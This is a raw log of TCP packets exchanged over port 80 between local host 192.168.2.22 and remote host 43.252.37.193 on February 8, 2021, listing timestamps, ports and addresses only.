Feb 8, 2021 06:39:03.428666115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428682089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428698063 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428765059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428785086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428802967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428813934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428822041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428843975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633102894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633140087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633158922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633182049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633204937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633225918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633240938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633282900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633289099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633292913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633297920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633301020 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633302927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633348942 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633364916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633404970 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633415937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633430004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.633462906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.633477926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840342045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840460062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840490103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840532064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840572119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840596914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840626001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840651989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840666056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840677023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.840712070 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840718031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840722084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840725899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840728998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840790987 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.840806961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.047415018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047451973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047463894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047477007 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047489882 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047502995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047514915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047525883 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047563076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047583103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.047743082 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252408028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252470970 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252509117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252548933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252588987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252636909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252680063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252706051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252720118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252736092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252739906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252743959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252747059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252769947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252789021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252810001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.252832890 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.252857924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.457432032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457463026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457479000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457495928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457511902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457521915 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.457531929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457552910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457556963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.457571030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457587957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457595110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.457606077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457621098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.457628012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.457660913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.662287951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662316084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662328959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662341118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662357092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662369013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662380934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662394047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662405968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662420034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.662560940 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.662597895 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.867048979 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867083073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867095947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867108107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867122889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867151022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867182970 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867199898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.867460012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:04.867983103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.868004084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:04.868154049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074475050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074552059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074596882 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074659109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074712992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074769974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074769020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074806929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074812889 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074816942 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074821949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074858904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074875116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074902058 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.074927092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074975967 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.074992895 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.075026989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.075042009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.075047970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.075078011 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.075105906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.075151920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279462099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279537916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279588938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279635906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279685974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279735088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279788017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279838085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279858112 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279864073 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279891968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279927969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279943943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.279964924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.279993057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.280014992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.280044079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.280050993 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.280093908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.280129910 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.280169010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.484929085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485002041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485055923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485105991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485137939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485160112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485189915 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485194921 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485198975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485217094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485225916 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485266924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485284090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485316992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485332012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485367060 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485383034 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485430956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485455990 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485507965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.485527992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.485569000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690035105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690103054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690143108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690180063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690217972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690256119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690274954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690304995 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690314054 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690320015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690324068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690329075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690350056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690387964 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690391064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690419912 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690428019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.690432072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690475941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.690506935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896632910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896662951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896680117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896696091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896713018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896728039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896744013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896759033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896776915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:05.896794081 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896840096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896846056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896850109 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896853924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896859884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:05.896863937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.103873014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.103904009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.103923082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.103940010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104003906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104022980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104032040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.104082108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.104088068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.104126930 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104147911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104166031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104181051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.104203939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.104231119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.104243040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.311265945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311295033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311311960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311326027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311341047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311356068 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311371088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311387062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311455011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.311501980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.311507940 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.311551094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.311625004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518539906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518570900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518588066 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518605947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518623114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518650055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518670082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518687010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518702984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518703938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518721104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518740892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.518740892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518748999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518754005 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518758059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518763065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518767118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518770933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518774986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518830061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.518852949 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.719521999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.719881058 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.723380089 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723404884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723423004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723439932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723454952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723467112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723483086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.723565102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.723608017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.723618984 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:06.927850008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927875042 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927887917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927918911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927933931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927947998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.927963018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:06.928244114 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.133579969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133606911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133618116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133629084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133645058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133657932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133672953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133687019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.133965015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134011030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134016991 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134021044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134025097 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134030104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134033918 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.134037971 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.338668108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338751078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338795900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338835955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338887930 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338903904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.338928938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.338938951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.338968992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.339031935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.339046955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.339054108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.339059114 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543565035 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543636084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543675900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543715000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543715000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543751955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543756008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543757915 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543786049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543807030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543840885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543870926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.543880939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.543946981 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.750875950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.750947952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.750987053 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.751019001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.751028061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.751060963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.751066923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:07.751070023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:07.751071930 CET	49165	80	192.168.2.22	43.252.37.193
